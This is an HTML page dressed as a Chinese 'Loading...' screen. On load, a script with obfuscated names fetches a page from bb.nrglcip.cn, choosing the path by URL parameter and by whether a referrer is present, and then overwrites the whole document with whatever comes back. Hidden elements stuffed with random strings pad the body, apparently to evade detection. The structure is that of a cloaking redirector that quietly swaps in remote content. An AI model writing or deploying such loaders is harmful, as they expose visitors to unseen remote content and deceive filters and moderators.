<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .dudjvmjuP5 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .dudjvmjuP5 .VcnSrcKwCW {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .dudjvmjuP5 .content {
            line-height: 50px;
            text-align: center
        }

        .dudjvmjuP5 .img {
            width: 100%
        }

        .dudjvmjuP5 .uk1rMjOC {
            text-align: center
        }

        .dudjvmjuP5 .uk1rMjOC span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .dudjvmjuP5 .uk1rMjOC span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .dudjvmjuP5 .uk1rMjOC span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .dudjvmjuP5 .uk1rMjOC span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .dudjvmjuP5 .uk1rMjOC span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .dudjvmjuP5 .uk1rMjOC span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .dudjvmjuP5 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function gAlYbsl5t(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var zAOSbO4 = gAlYbsl5t('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ zAOSbO4 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ zAOSbO4 +".html?a=share";
		}
		
        oWGaIgV6yF=url+"#"+new Date().getTime();
        oWGaIgV6yF && function() {
            $.get(oWGaIgV6yF, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<li style='display:none' >ko5oISuXUmp1hbdai313dN7Tq0w20Mt1sOeAG8IgKT9Ow537Tyu2utGKF6o6YeCyx</li>
<h1 style='display:none' >uBAZo6p5WMG4YVb2bhGH4xESaANJoPpeX2kFvuv70ohxjp3MftJ0fj96BNyYDjw1ssDiGYZF6BlC2H55y9vmYhH8MR</h1>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>Vrj4eHtHBkkezeDDGWYMVSWVvlUtQbaRGAiyKiU6ZGsKXPEacr8wndbO</a>
<div style='display:none'>z3XIAEOboq4VXDvl1FZ</div><div class="dudjvmjuP5">
    <div class="VcnSrcKwCW">
        <div class="uk1rMjOC">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >uveZhWMKxPnWElx1J3kJF32sS5wHq</ul>
<li style='display:none' >jhyaqpd8ih3HdjeYGGzib2QpbULcjXSrTKbjual9dr98sMrq7aQpmWQVYQRVpaAx</li>
<b style='display:none' >fqR4INvE7nxZwswymKEKGVTEVhuNu7Q28UqYvqnbibaGei119eJFjPWkHMru42YnOwzm0JIKQdH1moL30vEgPjgFISadf2WScnI0</b>
<b style='display:none' >fqR4INvE7nxZwswymKEKGVTEVhuNu7Q28UqYvqnbibaGei119eJFjPWkHMru42YnOwzm0JIKQdH1moL30vEgPjgFISadf2WScnI0</b>
<div style='display:none'>fY6F7lZ4EKicTxS3XHMXjaVUEsdccZdNtp8TkSeGE0I2W5</div>
<p  style='display:none'>LXR0ZlEaAmuNrDHFBaxA1zdHIwg8BEDQecWCLSOVkMbbhHO4rkGTyOCzs8B</p></body>
</html>